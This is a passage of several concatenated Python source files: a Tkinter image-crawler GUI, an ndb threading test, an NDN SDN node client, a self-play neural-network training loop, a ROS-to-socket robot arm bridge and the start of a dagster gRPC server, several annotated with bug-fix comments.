        self.findButton = Button(self.buttonFrame, command=self.findThreadingStart)
        self.findButton.configure(text='▽', width=30, highlightbackground="gray17")
        self.findButton.pack(padx=7, pady=5)
        # Notification area (one side per printer)
        self.notificationFrame = Frame(self.mainFrame, background="gray17")
        self.notificationFrame.pack(side=TOP, fill=X)
        self.notification1Frame = Frame(self.notificationFrame, background="gray17")
        self.notification1Frame.pack(side=LEFT, fill=X)
        self.number1Label = Label(self.notification1Frame, background="gray17")
        self.number1Label.pack(side=LEFT, padx=10, pady=5)
        self.numberview1Label = Label(self.notification1Frame, background="gray17")
        self.numberview1Label.pack(side=LEFT, padx=10, pady=5)
        self.notification2Frame = Frame(self.notificationFrame, background="gray17")
        self.notification2Frame.pack(side=RIGHT, fill=X)
        self.number2Label = Label(self.notification2Frame, background="gray17")
        self.number2Label.pack(side=LEFT, padx=10, pady=5)
        self.numberview2Label = Label(self.notification2Frame, background="gray17")
        self.numberview2Label.pack(side=LEFT, padx=10, pady=5)
        # Warning area (one side per printer)
        self.warningFrame = Frame(self.mainFrame, background="gray17")
        self.warningFrame.pack(side=TOP, fill=X)
        self.warning1Frame = Frame(self.warningFrame, background="gray17")
        self.warning1Frame.pack(side=LEFT, fill=X)
        self.warning1Label = Label(self.warning1Frame, background="gray17")
        self.warning1Label.pack(side=LEFT, padx=10)
        self.warning2Frame = Frame(self.warningFrame, background="gray17")
        self.warning2Frame.pack(side=RIGHT, fill=X)
        self.warning2Label = Label(self.warning2Frame, background="gray17")
        self.warning2Label.pack(side=LEFT, padx=10)
        # Bluetooth connect (the serial link is currently disabled)
        print("Start")
        port = "/dev/cu.TEST1-DevB"  # device-specific; on Windows this would be a COM port
        # self.bluetooth = serial.Serial(port, 9600)  # start communications with the bluetooth unit
        print("Connected")
        self.bluetooth = None

    def findThreadingStart(self):
        """Run findImage on a worker thread so the UI stays responsive."""
        self.findThread = threading.Thread(target=self.findImage)
        self.findThread.start()

    def _warn(self, text):
        """Show *text* on the warning label of the currently selected printer."""
        if self.print_sel.get() == self.print1:
            self.warning1Label.configure(text=text, foreground="white")
        else:
            self.warning2Label.configure(text=text, foreground="white")

    def findImage(self):
        """Validate the form, then search images for the selected printer."""
        self.keySet.key = self.keyEntry.get()
        if self.keySet.key == "":
            # BUG FIX: original referenced the undefined self.warningLabel here.
            self._warn('[*] Please input keywords!')
            return
        self.keySet.img_count = self.img_cntEntry.get()
        try:
            self.keySet.img_count = int(self.keySet.img_count)
            if self.keySet.img_count == 0:
                self._warn('[*] Please input lager then 0 in Image Count form')
                return
        except ValueError:
            self._warn('[*] Please input only INTEGER in Image Count form!')
            return
        self.keySet.corr_cnt = self.corr_cntEntry.get()
        try:
            self.keySet.corr_cnt = int(self.keySet.corr_cnt)
        except ValueError:
            self._warn('[*] Please input only INTEGER in Correlate Count form!')
            return
        self.keySet.dep = self.depthEntry.get()
        try:
            self.keySet.dep = int(self.keySet.dep)
        except ValueError:
            self._warn('[*] Please input only INTEGER in Depth Number form!')
            return
        sleep_time = self.sleepEntry.get()
        try:
            sleep_time = int(sleep_time)
        except ValueError:
            self._warn('[*] Please input only INTEGER in Sleep Time form!')
            return
        self.keySet.land_sel = self.country_sel.get()
        self.keySet.print_sel = self.print_sel.get()
        # Expand the window with process/preview panes on the first search.
        if self.count == 0:
            self.process_page()
        self.count += 1
        if self.print_sel.get() == self.print1:
            # The main keyword would be forwarded over bluetooth here:
            # self.bluetooth.write(b"K1" + str(key))
            self._warn('[*] Finding Images...')
            self.number1Label.configure(text='Images found : ', background="gray17", foreground="white")
            self.numberview1Label.configure(text='N/A', background="gray17", foreground="white")
            self.main = main.Main(self.keySet, self.bluetooth, self.process1Text, self.imageLabel, sleep_time)
            self.number1 = self.main.findImg()
            if self.number1 == -1:
                self._warn('[*] No such Tag, please use other Tag')
                return
            elif self.number1 == -2:
                self._warn('[*] Exception occured. Please feedback to developer.')
                return
            self.numberview1Label.configure(text=str(self.number1))
            self._warn('[*] Finding Images finished')
        else:
            # self.bluetooth.write(b"K2" + str(key))
            self._warn('[*] Finding Images...')
            self.number2Label.configure(text='Images found : ', background="gray17", foreground="white")
            self.numberview2Label.configure(text='N/A', background="gray17", foreground="white")
            self.main = main.Main(self.keySet, self.bluetooth, self.process2Text, self.imageLabel, sleep_time)
            self.number2 = self.main.findImg()
            if self.number2 == -1:
                self._warn('[*] No such Tag, please use other Tag')
                return
            elif self.number2 == -2:
                self._warn('[*] Exception occured. Please feedback to developer.')
                return
            self.numberview2Label.configure(text=str(self.number2))
            self._warn('[*] Finding Images finished')

    def process_page(self):
        """Go fullscreen and add per-printer log panes plus a preview image."""
        DIR = os.path.join(os.path.expanduser('~'), "Desktop/Pictures")
        # NOTE(review): uses the module-level ``root`` rather than self.master.
        root.attributes('-fullscreen', True)
        self.processFrame = Frame(self.mainFrame, background="gray17")
        self.processFrame.pack(side=TOP)
        self.process1Frame = Frame(self.processFrame, background="gray17")
        self.process1Frame.pack(side=LEFT)
        self.process1Text = Text(self.process1Frame, width=90, height=80, background="gray17", insertbackground="white")
        self.process1Text.configure(foreground="white")
        self.process1Text.pack(fill=X, padx=5, pady=5)
        self.imageFrame = Frame(self.processFrame, background="gray17")
        self.imageFrame.pack(side=LEFT)
        photo = ImageTk.PhotoImage(Image.open(DIR + "/logo.png"))
        self.imageLabel = Label(self.imageFrame, image=photo, width=400, height=500)
        self.imageLabel.image = photo  # keep a reference!
        self.imageLabel.pack()
        self.process2Frame = Frame(self.processFrame, background="gray17")
        self.process2Frame.pack(side=RIGHT)
        self.process2Text = Text(self.process2Frame, width=90, height=80, background="gray17", insertbackground="white")
        self.process2Text.configure(foreground="white")
        self.process2Text.pack(fill=X, padx=5, pady=5)

    def stopCrawling(self):
        # BUG FIX: original referenced the undefined self.warningLabel.
        self._warn("[*] It can't be used!!")

    def help(self):
        """Pop up the usage instructions."""
        helpString = """ [Usage]
1. Input the keywords in the box. (ex: car)
2. Input the image count you want to crawl.
Input the correlate count you want to crawl.
Input the depth count you want to crawl.
!! Too many count (like above 100) can take many time.
!! So please be careful.
3. Click the Find button, and wait for finishing.
4. After finished, input the number you want to crawl.
If there's anything or number is greater than (3),
It's automatically set as the maximum(3's number).
If you want to crawl all of them, input 'MAX'.
5. Click the Start Button, and wait for finishing.
=============================================
This Program was made by Cdol.
It's made up of Python 2.7.10, with Tkinter, BeautifulSoup.
Please Feedback : ivrson9@gmail.com"""
        tkMessageBox.showinfo("Images_Crawler::Help",helpString)
# ---- module entry point: build the root window and start the UI loop ----
root = Tk()
root.title("Crawler")
root.geometry("600x800+400+200")
root.configure(background="gray17")
# maximize: root.attributes('-fullscreen', True)
myApp = Interface(root)
root.mainloop()
|
mttest.py | #
# Copyright 2008 The ndb Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A torture test to ferret out problems with multi-threading."""
import sys
import threading
from ndb import tasklets
from ndb import eventloop
def main():
    """Spawn N worker threads, each running the tasklet torture test.

    The thread count defaults to 10 and may be overridden by argv[1].
    """
    thread_count = 10
    try:
        thread_count = int(sys.argv[1])
    except Exception:
        pass  # no/invalid argument: keep the default
    workers = []
    for index in range(thread_count):
        worker = threading.Thread(target=one_thread, args=(index, thread_count,))
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
@tasklets.toplevel
def one_thread(i, num):
    # Each thread drives fibonacci(num) through its own tasklet event loop;
    # *i* identifies the thread in the output line.
    ##sys.stdout.write('eventloop = 0x%x\n' % id(eventloop.get_event_loop()))
    x = yield fibonacci(num)
    sys.stdout.write('%d: %d --> %d\n' % (i, num, x))
@tasklets.tasklet
def fibonacci(n):
    """A recursive Fibonacci to exercise task switching.

    ndb tasklets deliver their result by raising tasklets.Return, so every
    exit path raises rather than returns.
    """
    if n <= 1:
        raise tasklets.Return(n)
    a = yield fibonacci(n - 1)
    b = yield fibonacci(n - 2)
    raise tasklets.Return(a + b)
# Allow running the torture test directly from the command line.
if __name__ == '__main__':
    main()
|
node.py | #!/usr/bin/python3
#
# Copyright (C) 2019 Trinity College of Dublin, the University of Dublin.
# Copyright (c) 2019 Li Jian
# Author: Li Jian <lij12@tcd.ie>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''This module is the OF-SDN 'client', which needs to be run on every NDN node.
Before running this code, the OF-SDN controller side should be run first, so that
this node could report to the controller.
---This module used multiple threads to handle different tasks.
---This module included some other functions, refer to its optional arguments
'''
import sys
import time
import argparse
import traceback
import subprocess
from pyndn import Face
from oscommand import OSCommand
from helloreq import HelloReq
from status.status_monitor import Status_Monitor
from flowremoved import FlowRemovedMsg
from packetin import PacketIn
from featureres import FeatureRes
from ctrlinforeq import CtrlInfoReq
from threading import Thread
from errormsg import ErrorMsg
from of_route_processor import OF_Route_Processor
class Node(object):
    """OF-SDN client run on every NDN node.

    Starts the background services that report to the controller and can
    optionally emit PacketIn / FlowRemoved / Error demo messages.
    """

    def __init__(self):
        # Outstanding Interests and their retransmission bookkeeping.
        self.outstanding = dict()
        self.isDone = False
        # self.face = Face("127.0.0.1")
        self.face = Face()
        self.nodeid = OSCommand.getnodeid()

    def run(self, packetin=False, fr=False, error=False):
        """Advertise this node's prefix, then start the service threads."""
        node_prefix = '/ndn/{}-site/{}/ofndn'.format(self.nodeid, self.nodeid)
        subprocess.call(["export HOME=/tmp/minindn/{0} && nlsrc advertise {1} ".format(self.nodeid, node_prefix)], shell=True)

        # ---- basic services, each on its own thread ----
        for service in (self.Hellorequest, self._sendCtrlInfoReqMsg,
                        self.Feature_service, self.OF_Route):
            Thread(target=service).start()

        # ---- optional / demo messages ----
        time.sleep(15)
        unknown_prefix = "/abcd/dfgh/tcd"
        if packetin:
            # Ask the controller about a prefix with no known next hop.
            Thread(target=self.prefixinquire, args=(unknown_prefix,)).start()
        removed_prefix = "/abcd/dfgh/tcd"
        if fr:
            Thread(target=self._sendFlowRemovedMsg, args=(removed_prefix,)).start()
        error_prefix = "{}--0x0004--0x0000--faceid255-down".format(self.nodeid)
        if error:
            time.sleep(7)
            Thread(target=self._errormsg, args=(error_prefix,)).start()

    def Hellorequest(self):
        # Periodic hello/status reporting to the controller.
        Status_Monitor().run()

    def Feature_service(self):
        # Answer feature requests coming from the controller.
        FeatureRes().run()

    def OF_Route(self):
        # Let NFD settle before listening for noNextHop log entries.
        time.sleep(8)
        OF_Route_Processor().loglistener()

    def prefixinquire(self, unknown_prefix):
        if PacketIn().run(unknown_prefix):
            print("NDN FlowTable has been updated")

    def _errormsg(self, error_prefix):
        ErrorMsg().run(error_prefix)

    def _sendFlowRemovedMsg(self, removed_prefix):
        FlowRemovedMsg().run(removed_prefix)

    def _sendCtrlInfoReqMsg(self):
        time.sleep(5)
        CtrlInfoReq().run()  # here need other thread.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Parse command line args for ndn consumer')
    parser.add_argument("-p", "--packetin", nargs='?', const=True, help='True | False send PacketIn msg?')
    parser.add_argument("-fr", "--flowremoved", nargs='?', const=True, help='True | False send FlowRemoved msg?')
    parser.add_argument("-e", "--error", nargs='?', const=True, help='True | False send Error msg?')
    args = parser.parse_args()
    try:
        Node().run(args.packetin, args.flowremoved, args.error)
    except Exception:
        # BUG FIX: the original bare ``except:`` also swallowed SystemExit /
        # KeyboardInterrupt and always blamed "command line arguments" even
        # though parsing happens before the try block; report the real error.
        traceback.print_exc(file=sys.stdout)
        print("Node terminated with an unhandled exception")
        sys.exit(1)
Multiprocessing.py | import Train
from multiprocessing import Process, Manager
import numpy as np
import time
from FourInARow import Config
# from TicTacToe import Config
from collections import defaultdict
class DataStore:
    """Fixed-size ring buffer of training epochs.

    At most ``max_epochs_stored`` entries are kept; once full, the oldest
    slot is overwritten because ``counter`` wraps around.
    """

    def __init__(self, max_epochs_stored):
        self.data = {}
        self.max_epochs_stored = max_epochs_stored
        self.counter = 0  # next slot to (over)write

    def put_data(self, x, y_pol, y_val):
        """Store one epoch of samples, evicting the oldest slot when full."""
        self.data[self.counter] = [x, y_pol, y_val]
        self.counter = (self.counter + 1) % self.max_epochs_stored

    def get_data(self):
        """Concatenate all stored epochs into three numpy arrays."""
        states, policies, values = [], [], []
        for stored_x, stored_pol, stored_val in self.data.values():
            states.extend(stored_x)
            policies.extend(stored_pol)
            values.extend(stored_val)
        return np.array(states), np.array(policies), np.array(values)
def multiprocess_function(config, num_processes, num_games_each_process, num_search, name_weights, seeds=None):
    """Generate self-play data in parallel worker processes.

    Args:
        config: game configuration module.
        num_processes: number of worker processes to spawn.
        num_games_each_process: games each worker plays.
        num_search: MCTS searches per move.
        name_weights: path of the weights file workers load.
        seeds: optional list (one entry per process) of per-game seed lists;
            drawn randomly when omitted.

    Returns:
        Tuple of numpy arrays (x, y_pol, y_val) concatenated over workers.
    """
    # BUG FIX: with the default seeds=None the original crashed on seeds[i]
    # (TypeError: 'NoneType' object is not subscriptable); draw one per-game
    # seed list for each worker instead.
    if seeds is None:
        seeds = [[np.random.randint(0, 1000000000) for _ in range(num_games_each_process)]
                 for _ in range(num_processes)]
    res_dict = Manager().dict()
    workers = [Process(target=Train.generate_data,
                       args=(res_dict, config, num_games_each_process, num_search, i, name_weights, seeds[i]))
               for i in range(num_processes)]
    for worker in workers:
        worker.daemon = True
        worker.start()
    for worker in workers:
        worker.join()
    print("done")
    x, y_pol, y_val = [], [], []
    # Merge every worker's result slices into flat lists.
    for value in res_dict.values():
        x.extend(value[0])
        y_pol.extend(value[1])
        y_val.extend(value[2])
    return np.array(x), np.array(y_pol), np.array(y_val)
def train_process(x, y_pol, y_val, load_name, store_name, h, w, d):
    """Train the network on one batch of self-play data.

    Meant to run in its own process so TensorFlow releases GPU memory when
    the process exits.  NOTE(review): uses TF1-only APIs (tf.GPUOptions,
    tf.Session, keras.backend.tensorflow_backend) — requires TF 1.x.
    """
    # Importing libraries and setting the max gpu usage
    from keras.optimizers import SGD
    from loss import softmax_cross_entropy_with_logits, softmax
    import ResNet
    import tensorflow as tf
    from keras.backend.tensorflow_backend import set_session
    # Cap GPU memory so self-play workers can share the device.
    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)
    sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
    set_session(sess)
    # Training the agent and storing the new weights
    agent = ResNet.ResNet.build(h, w, d, 128, Config.policy_output_dim, num_res_blocks=10)
    agent.compile(loss=[softmax_cross_entropy_with_logits, 'mean_squared_error'],
    optimizer=SGD(lr=0.0005, momentum=0.9))
    agent.load_weights(load_name)
    agent.fit(x=x, y=[y_pol, y_val], batch_size=min(128, len(x)), epochs=2, callbacks=[])
    agent.save_weights(store_name)
def combine_equals(x, y_pol, y_val):
    """Merge duplicate board states, averaging their policy/value targets.

    States are bucketed by their string representation; each bucket tracks
    [count, state, policy-sum, value-sum] and is averaged at the end.
    """
    buckets = defaultdict(lambda: [0, None, np.zeros(y_pol[0].shape), 0])
    for state, pol, val in zip(x, y_pol, y_val):
        bucket = buckets[str(state)]
        bucket[0] += 1
        bucket[1] = state
        bucket[2] += pol
        bucket[3] += val
    merged_states = [bucket[1] for bucket in buckets.values()]
    merged_pols = [bucket[2] / bucket[0] for bucket in buckets.values()]
    merged_vals = [bucket[3] / bucket[0] for bucket in buckets.values()]
    return np.array(merged_states), np.array(merged_pols), np.array(merged_vals)
def train(config, epochs, num_processes, num_games_each_process, num_search, game_name):
    """Alternate self-play data generation and network training.

    Each epoch: generate games in parallel from the current weights, merge
    duplicate positions, add them to the replay store, and train a fresh
    process on the accumulated data, saving the next weights file.
    """
    h, w, d = config.board_dims[1:]
    data_store = DataStore(4)
    # TODO: create process that does this
    # import ResNet as nn
    base_name = "Models/" + str(game_name) + "/"
    # nn.ResNet().build(h, w, d, 128, config.policy_output_dim, num_res_blocks=10).save_weights(base_name + "10_3_0.h5")
    for epoch in range(epochs):
        now = time.time()
        load_weights_name = base_name + "10_3_" + str(epoch) + ".h5"
        seed_max = 1000000000
        # BUG FIX: the outer comprehension iterated num_games_each_process,
        # so seeds[i] raised IndexError whenever num_processes exceeded it;
        # one per-game seed list is needed for each *process*.
        seeds = [[np.random.randint(0, seed_max) for _ in range(num_games_each_process)]
                 for _ in range(num_processes)]
        x, y_pol, y_val = multiprocess_function(config, num_processes, num_games_each_process, num_search,
                                                load_weights_name,
                                                seeds=seeds)
        x, y_pol, y_val = combine_equals(x, y_pol, y_val)
        # NOTE(review): this uses the constant ``epochs`` (window is 40 from
        # the start for long runs); growing with ``epoch`` may be intended.
        data_store.max_epochs_stored = min(40, 4 + 3 * epochs // 4)
        data_store.put_data(x, y_pol, y_val)
        x, y_pol, y_val = data_store.get_data()
        store_weights_name = base_name + "10_3_" + str(epoch + 1) + ".h5"
        # Train in a child process so TF/keras GPU memory is freed on exit.
        worker = Process(target=train_process, args=(x, y_pol, y_val, load_weights_name, store_weights_name, h, w, d))
        worker.daemon = True
        worker.start()
        worker.join()
        print("Finished epoch", epoch, "time:", time.time() - now)
    return None
# Entry point: 3000 epochs, 8 worker processes x 500 games, 600 searches/move.
if __name__ == '__main__':
    train(Config, 3000, 8, 500, 600, Config.name)
|
HiwinRA605_socket_ros_test_20190625194804.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0'  # initial value of the TCP payload forwarded to the controller
Arm_feedback = 1  # assume the arm is busy at start-up
state_feedback = 0  # last reply from the 'arm_state' ROS service
NAME = 'socket_server'
client_response = 0  # number of replies sent back to the strategy side
point_data_flag = False  # set by point_data() when a new pose arrives
arm_mode_flag = False  # set by Arm_Mode() when a new arm mode arrives
speed_mode_flag = False  # set by Speed_Mode() when a new speed mode arrives
##------------class pos-------
class point():
    """Cartesian pose: position (x, y, z) plus pitch/roll/yaw angles."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw


# Shared pose, overwritten by the ROS service callbacks below.
pos = point(0, 36.8, 11.35, -90, 0, 0)
##------------class socket_cmd---------
class socket_cmd():
    """Record of the current arm command (grip, velocity, mode flags).

    NOTE(review): the rest of this module assigns socket_cmd.action etc. as
    *class* attributes and never instantiates the class, so __init__ is
    effectively unused at runtime.
    """

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        self.grip, self.setvel, self.ra = grip, setvel, ra
        self.delay, self.setboth = delay, setboth
        self.action, self.Speedmode = action, Speedmode
##-----------switch define------------##
class switch(object):
    """C-style switch/case helper (classic ActiveState recipe).

    Usage::

        for case in switch(value):
            if case('a'): ...; break
            if case('b'): ...          # falls through to later cases
            if case():    ...          # default branch

    A match sets ``fall`` so subsequent cases also match (fall-through);
    ``case()`` with no arguments always matches.
    """

    def __init__(self, value):
        self.value = value
        self.fall = False

    def __iter__(self):
        """Return the match method once, then stop."""
        yield self.match
        # BUG FIX: ``raise StopIteration`` inside a generator becomes a
        # RuntimeError under PEP 479 (Python 3.7+), crashing any loop that
        # exhausts the iterator without a break; a plain return ends cleanly.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Report the arm's busy/ready state through the 'arm_state' ROS service.

    Stores the service reply in the module-level ``state_feedback`` and
    returns it; on service failure the error is only printed.
    """
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = Arm_state_client(Arm_state)
        # pos_feedback_times = pos_feedback.response
        return state_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req):  # receives the pose sent by the strategy side
    """ROS service callback: copy the requested pose into the shared ``pos``.

    Returns the running count of handled requests.
    NOTE(review): fields are stored as *strings* ('%s' % ...); the TCP
    command builders interpolate them into text commands, so this works,
    but the types differ from the floats ``pos`` was constructed with.
    """
    global client_response,point_data_flag
    pos.x = '%s'%req.x
    pos.y = '%s'%req.y
    pos.z = '%s'%req.z
    pos.pitch = '%s'%req.pitch
    pos.roll = '%s'%req.roll
    pos.yaw = '%s'%req.yaw
    point_data_flag = True  # tells socket_client() a new pose is pending
    client_response = client_response + 1
    return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):  # receives the arm-mode request from the strategy side
    """ROS service callback: latch the requested arm command mode.

    NOTE(review): writes *class* attributes on socket_cmd (the class is
    never instantiated); int('%s' % ...) round-trips each field through str.
    """
    global arm_mode_flag
    socket_cmd.action = int('%s'%req.action)
    socket_cmd.grip = int('%s'%req.grip)
    socket_cmd.ra = int('%s'%req.ra)
    socket_cmd.setvel = int('%s'%req.vel)
    socket_cmd.setboth = int('%s'%req.both)
    arm_mode_flag = True  # tells socket_client() a new command is pending
    return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req):  # receives the speed-mode request from the strategy side
    """ROS service callback: latch the requested speed mode (fast/safe)."""
    global speed_mode_flag
    socket_cmd.Speedmode = int('%s'%req.Speedmode)
    speed_mode_flag = True  # tells socket_client() a new command is pending
    return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server():  # create the ROS server node
    """Register the arm_mode / arm_pos / speed_mode services and spin."""
    rospy.init_node(NAME)
    a = rospy.Service('arm_mode',arm_mode, Arm_Mode)  # serves arm mode data
    s = rospy.Service('arm_pos',arm_data, point_data)  # serves arm point data
    b = rospy.Service('speed_mode',speed_mode, Speed_Mode)  # serves speed mode data
    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    print ("Ready to connect")
    rospy.spin()  # block and process service callbacks
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
    """Forward arm commands from the ROS callbacks to the controller PC.

    Polls the new-request flags set by the service callbacks, builds the
    matching TCP command string, sends it over the raw socket, and relays
    the arm's busy/ready feedback back via socket_client_arm_state().
    Runs until the controller reports strategy completion ('6').
    """
    global Arm_feedback, data
    # BUG FIX: these flags are reassigned inside the loop, so without a
    # global declaration Python treats them as locals and the very first
    # read of point_data_flag raised UnboundLocalError.
    global point_data_flag, arm_mode_flag, speed_mode_flag
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.0.1', 8080))  # iclab 5 & iclab hiwin
        # s.connect(('192.168.1.102', 8080))  # iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(s.recv(1024))
    # start_input = int(input(...))  # originally asked: 1 to start, 3 to quit
    start_input = 1
    if start_input == 1:
        while 1:
            # ---- send a command only when a new request has arrived ----
            # (grouping reconstructed; original indentation was lost)
            # if Arm_feedback == 0:
            if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
                point_data_flag = False
                arm_mode_flag = False
                speed_mode_flag = False
                # ---- dispatch on the requested action ----
                for case in switch(socket_cmd.action):
                    # ---- point-to-point motion ----
                    if case(Taskcmd.Action_Type.PtoP):
                        for case in switch(socket_cmd.setboth):
                            if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                        break
                    # ---- linear motion ----
                    if case(Taskcmd.Action_Type.Line):
                        for case in switch(socket_cmd.setboth):
                            if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                                break
                        break
                    # ---- set arm velocity ----
                    if case(Taskcmd.Action_Type.SetVel):
                        data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                        break
                    # ---- set arm delay time ----
                    if case(Taskcmd.Action_Type.Delay):
                        data = TCP.SetDelay(socket_cmd.grip,0)
                        break
                    # ---- toggle fast / safe speed mode ----
                    if case(Taskcmd.Action_Type.Mode):
                        data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                        break
                socket_cmd.action = 5  # back to the idle mode state
                s.send(data.encode('utf-8'))  # commands are sent as UTF-8 text
                feedback_str = s.recv(1024)
                # The controller reports the arm state in byte 2 of the reply.
                if str(feedback_str[2]) == '70':  # 'F': ready for the next motion command
                    Arm_feedback = 0
                    socket_client_arm_state(Arm_feedback)
                    # print("isbusy false")
                if str(feedback_str[2]) == '84':  # 'T': busy, cannot take a command
                    Arm_feedback = 1
                    socket_client_arm_state(Arm_feedback)
                    # print("isbusy true")
                if str(feedback_str[2]) == '54':  # '6': strategy finished
                    Arm_feedback = 6
                    socket_client_arm_state(Arm_feedback)
                    print("shutdown")
            # ---- end of command forwarding ----
            if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
                rospy.on_shutdown(myhook)
                break
    if start_input == 3:
        pass
    s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
    # Worker-thread entry point: runs the socket bridge loop.
    socket_client()
## 多執行序 end
def myhook():
    # rospy shutdown hook, registered via rospy.on_shutdown().
    print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  # start in the idle mode state
    t = threading.Thread(target=thread_test)
    t.start()  # run the socket client on a separate thread
    socket_server()
    t.join()
# Editor shortcut notes (VS Code):
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
server.py | import math
import multiprocessing
import os
import queue
import sys
import threading
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
from typing import NamedTuple
import grpc
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.origin import DEFAULT_DAGSTER_ENTRY_POINT, get_python_environment_entry_point
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.utils import find_free_port, frozenlist, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
